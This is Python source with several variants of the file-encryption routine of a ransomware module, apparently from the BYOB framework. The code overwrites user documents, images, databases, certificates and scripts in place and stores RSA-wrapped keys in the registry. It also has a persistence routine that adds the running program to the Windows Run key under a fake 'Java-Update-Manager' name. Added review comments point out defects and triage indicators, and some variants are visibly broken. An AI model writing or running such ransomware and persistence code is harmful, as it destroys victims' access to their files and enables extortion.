def encrypt_file(path):
    """
    Encrypt a single file in place (early variant of the ransom module).

    Returns None without touching `path` unless it is an existing regular
    file whose extension appears in the hard-coded list below. Otherwise
    the statements are laid out to read the whole file, pass it to
    `crypto.encrypt_aes`, overwrite the file with the result, wrap the AES
    key with RSA-OAEP and record the wrapped key through
    `util.registry_key`.

    :param str path:    target filename

    Every exception is caught and reported through `util.debug` only, so
    callers get no success/failure signal from this variant.
    """
    try:
        # Guard: only regular files with a listed extension are processed.
        # The comparison is case-sensitive and the list contains duplicates.
        if not os.path.isfile(path) or not os.path.splitext(path)[1] in [
                '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img',
                '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html',
                '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
                '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx',
                '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2',
                '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
                '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2',
                '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw',
                '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt',
                '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
                '.js', '.rb', '.xml'
        ]:
            return
        # Key material is the 32-character hex digest of MD5 over 16 random
        # bytes, i.e. an ASCII string carrying at most 128 bits of entropy.
        aes_key = Crypto.Hash.MD5.new(Crypto.get_random_bytes(16)).hexdigest()
        # The whole file is read into memory at once.
        with open(path, 'rb') as fp:
            plaintext = fp.read()
        # NOTE(review): `key` is a local that is only assigned further down,
        # so as shown this call raises before anything is written and control
        # passes to the except block. `crypto.encrypt_aes` is defined outside
        # this block; its cipher mode is not visible here.
        ciphertext = crypto.encrypt_aes(plaintext, key)
        # In-place overwrite: no copy of the original content is kept.
        with open(path, 'wb') as fd:
            fd.write(ciphertext)
        # NOTE(review): `publickey` is not defined in this block; presumably
        # a module-level RSA public key. Confirm against the full module.
        cipher = Crypto.Cipher.PKCS1_OAEP.new(publickey)
        key = base64.b64encode(cipher.encrypt(aes_key))
        # Host artifact: one registry entry per processed file under
        # SOFTWARE\BYOB, named by the file path and holding the base64
        # RSA-wrapped key. The hive is chosen inside util.registry_key
        # (not shown). Presence of this key is a usable triage indicator.
        util.registry_key(r'SOFTWARE\BYOB', path, key)
        util.debug('{} encrypted'.format(path))
    except Exception as e:
        # Broad catch: any failure is reduced to a debug message.
        # NOTE(review): `encrypt` is not defined in this block, and
        # `func_name` exists only on Python 2 function objects.
        util.debug("{} error: {}".format(encrypt.func_name, str(e)))
def encrypt_file(filename, rsa_key):
    """
    Encrypt a file with AES-256-OCB symmetric encryption
    using a randomly generated key, encrypt the key
    with RSA-2048 asymmetric encryption, then store the
    filename and RSA-encrypted AES-key as a key in the
    Windows Registry

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        2048-bit public RSA key

    Returns True if successful, otherwise False

    NOTE(review): the 256-bit key length is visible below
    (32 random bytes); the OCB mode lives in `encrypt_aes`
    and the RSA modulus size is not checked here, so both
    are taken from the original description, not verified.

    """
    try:
        if os.path.isfile(filename):
            # Extension allow-list comes from a module-level `filetypes`
            # collection that is not part of this block.
            if os.path.splitext(filename)[1] in globals()['filetypes']:
                # Only the type of rsa_key is checked, not its size.
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # Fresh 32-byte key per file from the OS CSPRNG.
                    aes_key = os.urandom(32)
                    # Whole file is read into memory at once.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = encrypt_aes(data, aes_key)
                    # In-place overwrite: the original content is gone
                    # from this path once the write completes.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # The wrapped key is stored only after the overwrite;
                    # if the registry write raises, the per-file key is
                    # never persisted. Relevant for incident response:
                    # a missing registry entry means no stored key for
                    # that file.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Host artifact: one entry per file, named by the
                    # file path, value = base64 RSA-OAEP-wrapped key,
                    # under the module-level `registry_key` path
                    # (argument order inferred from the call; confirm
                    # in util.registry_key).
                    util.registry_key(globals()['registry_key'], filename, key)
                    util.log('{} encrypted'.format(filename))
                    return True
        else:
            util.log("File '{}' not found".format(filename))
    except Exception as e:
        # Broad catch: every failure is logged and reported as False.
        # `func_name` is the Python 2 attribute name; on Python 3 this
        # handler line would itself raise AttributeError.
        util.log("{} error: {}".format(encrypt_file.func_name, str(e)))
    # Reached for unlisted extensions, a wrong rsa_key type (neither is
    # logged), a missing file, or any caught exception.
    return False
def encrypt_file(filename, rsa_key):
    """
    Encrypt a file with AES-256-OCB symmetric encryption
    using a randomly generated key, encrypt the key
    with RSA-2048 asymmetric encryption, then store the
    filename and RSA-encrypted AES-key as a key in the
    Windows Registry

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        2048-bit public RSA key

    Returns True if successful, otherwise False

    NOTE(review): the 256-bit key length is visible below
    (32 random bytes); the OCB mode lives in `encrypt_aes`
    and the RSA modulus size is not checked here, so both
    are taken from the original description, not verified.

    """
    try:
        if os.path.isfile(filename):
            # Extension allow-list is the module-level `filetypes`
            # collection, defined outside this block.
            if os.path.splitext(filename)[1] in globals()['filetypes']:
                # Type check only; key size is not validated.
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # Per-file 32-byte key from the OS CSPRNG.
                    aes_key = os.urandom(32)
                    # Entire file content is loaded into memory.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = encrypt_aes(data, aes_key)
                    # The same path is reopened for writing, so the
                    # original bytes are replaced, not copied aside.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # Key wrapping and storage happen after the
                    # overwrite. A failure from here on leaves the file
                    # changed with no stored key for it.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Host artifact for triage: registry entry named by
                    # the file path holding the base64 wrapped key, under
                    # the module-level `registry_key` path (argument
                    # order inferred from the call; confirm in
                    # util.registry_key).
                    util.registry_key(globals()['registry_key'], filename, key)
                    util.log('{} encrypted'.format(filename))
                    return True
        else:
            util.log("File '{}' not found".format(filename))
    except Exception as e:
        # Broad catch: all errors are logged through util.log and the
        # function falls through to return False.
        util.log("{} error: {}".format(encrypt_file.__name__, str(e)))
    # Also reached, without any log line, when the extension is not
    # listed or rsa_key is not an RsaKey instance.
    return False
def encrypt_file(filename, rsa_key):
    """
    Encrypt a file with AES-256-OCB symmetric encryption
    using a randomly generated key, encrypt the key
    with RSA-2048 asymmetric encryption, then store the
    filename and RSA-encrypted AES-key as a key in the
    Windows Registry

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        2048-bit public RSA key

    Returns True if successful, otherwise False

    NOTE(review): the 256-bit key length is visible below
    (32 random bytes); the OCB mode lives in
    `security.encrypt_aes` and the RSA modulus size is not
    checked here, so both are unverified from this block.

    """
    try:
        if os.path.isfile(filename):
            # Hard-coded, case-sensitive extension list (contains
            # duplicates). Covers documents, media, databases, key and
            # certificate files, and source/script files.
            if os.path.splitext(filename)[1] in [
                    '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img',
                    '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html',
                    '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
                    '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx',
                    '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2',
                    '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
                    '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2',
                    '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw',
                    '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt',
                    '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
                    '.js', '.rb', '.xml', '.py', '.pyc', '.wmi', '.sh', '.spec', '.asp', '.aspx',
                    '.plist', '.json', '.sql', '.vbs', '.ps1'
            ]:
                # Type check only; key size is not validated.
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # Per-file 32-byte random key.
                    aes_key = Crypto.Random.get_random_bytes(32)
                    # Entire file content is loaded into memory.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = security.encrypt_aes(data, aes_key)
                    # In-place overwrite of the original file.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # Wrapped key is stored only after the overwrite; a
                    # failure from here on leaves no stored key.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Host artifact for triage: registry entry named by
                    # the file path holding the base64 wrapped key, under
                    # the module-level `_registry_key` path (not shown).
                    util.registry_key(globals()['_registry_key'], filename, key)
                    util.debug('{} encrypted'.format(filename))
                    return True
        else:
            # NOTE(review): this variant mixes util.debug and
            # _debugger.debug; `_debugger` is defined outside this block.
            _debugger.debug("File '{}' not found".format(filename))
    except Exception as e:
        # Broad catch: all errors become a debug message and False.
        # `func_name` is the Python 2 attribute name.
        _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e)))
    # Also reached, without any log line, when the extension is not
    # listed or rsa_key is not an RsaKey instance.
    return False
def _add_registry_key(value=None, name='Java-Update-Manager'):
    """
    Register the running program under the Windows `Run` registry key.

    :param value:       overwritten with sys.argv[0] before use whenever
                        the platform/state check passes, so a value
                        supplied by the caller is not what gets written
    :param str name:    registry value name (default 'Java-Update-Manager')

    Returns (True, name) after a successful registry write, otherwise
    (False, None).

    Detection note: entries under
    SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run are launched at logon.
    The default value name imitates a Java updater, so an entry with this
    name whose data does not point at a vendor-installed Java binary is
    worth investigating. The hive (HKCU or HKLM) is chosen inside
    util.registry_key, which is not shown here.
    """
    try:
        # Windows only, and only when the module-level `_methods` table
        # does not already mark this method as established.
        if os.name == 'nt' and not _methods['registry_key'].established:
            # Path of the currently running script/executable.
            value = sys.argv[0]
            if value and os.path.isfile(value):
                try:
                    util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
                    return (True, name)
                except Exception as e:
                    # Registry write failed: logged, then falls through.
                    util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
    except Exception as e:
        # Covers failures in the platform/state check itself, e.g. a
        # missing 'registry_key' entry in `_methods`.
        util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
    return (False, None)
def _add_registry_key(value=None, name='Java-Update-Manager'):
    """
    Register the running program under the Windows `Run` registry key.

    :param value:       replaced by sys.argv[0] once the platform/state
                        check passes; a caller-supplied value is ignored
                        on that path
    :param str name:    registry value name (default 'Java-Update-Manager')

    Returns (True, name) after a successful registry write, otherwise
    (False, None).

    Detection note: values under
    SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run start at logon. The
    default name is chosen to look like a Java updater; compare the
    value's data with the real install location of any Java runtime on
    the host. Which hive is written depends on util.registry_key, which
    is outside this block.
    """
    try:
        # Runs only on Windows and only if the module-level `_methods`
        # entry for this technique is not yet flagged as established.
        if os.name == 'nt' and not _methods['registry_key'].established:
            # The running script/executable path becomes the Run data.
            value = sys.argv[0]
            if value and os.path.isfile(value):
                try:
                    util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
                    return (True, name)
                except Exception as e:
                    # `func_name` is the Python 2 attribute name; on
                    # Python 3 this handler line raises AttributeError,
                    # which the outer handler then catches.
                    util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
    except Exception as e:
        # Same Python 2 only attribute as above.
        util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
    return (False, None)
def encrypt_files(args):
    """
    Process one path and make sure an 'encrypt-files' worker thread exists.

    :param args:    accepted but never read in this block

    Returns None. All exceptions are caught and reported via util.debug.

    NOTE(review): `path`, `workers`, `jobs`, `threader` and `_encrypt` are
    not defined in this block; presumably module-level names. The source
    was collapsed onto one line, so whether the worker check sits inside
    or after the extension check cannot be told from here; it is laid out
    after it below.
    """
    try:
        # Hard-coded, case-sensitive extension list (contains duplicates).
        if os.path.splitext(path)[1] in [
                '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img',
                '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html',
                '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
                '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx',
                '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2',
                '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
                '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2',
                '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw',
                '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt',
                '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
                '.js', '.rb', '.xml'
        ]:
            # Key material is the hex digest of MD5 over 16 random bytes:
            # a 32-character ASCII string with at most 128 bits of entropy.
            aes_key = Crypto.Hash.MD5.new(
                Crypto.Ransom.get_random_bytes(16)).hexdigest()
            # NOTE(review): the `key=` keyword and the use of the return
            # value as an object with `.pubkey` do not match any
            # encrypt_file signature visible on this page. Confirm which
            # encrypt_file this variant was written against.
            ransom = encrypt_file(path, key=aes_key)
            cipher = Crypto.Cipher.PKCS1_OAEP.new(ransom.pubkey)
            key = base64.b64encode(cipher.encrypt(aes_key))
            # Records the base64 RSA-OAEP-wrapped key under an entry
            # named by the file path.
            util.registry_key(ransom, path, key)
            util.debug('{} encrypted'.format(path))
        # Start a worker only if no live thread is registered under a
        # key containing 'encrypt-files'.
        if not len([
                k for k in workers
                if 'encrypt-files' in k if workers[k].is_alive()
        ]):
            # Suffix is drawn from 1..100, so a later worker can reuse,
            # and replace, an earlier dictionary key.
            rnd = random.randint(1, 100)
            # The thread name is set to the current timestamp (a float).
            workers['encrypt-files-{}'.format(rnd)] = threading.Thread(
                target=threader, args=(jobs, ), name=time.time())
            # Daemon thread: does not keep the process alive at exit.
            workers['encrypt-files-{}'.format(rnd)].daemon = True
            workers['encrypt-files-{}'.format(rnd)].start()
    except Exception as e:
        # Broad catch: every failure becomes a debug message.
        # `func_name` is the Python 2 attribute name.
        util.debug("{} error: {}".format(_encrypt.func_name, str(e)))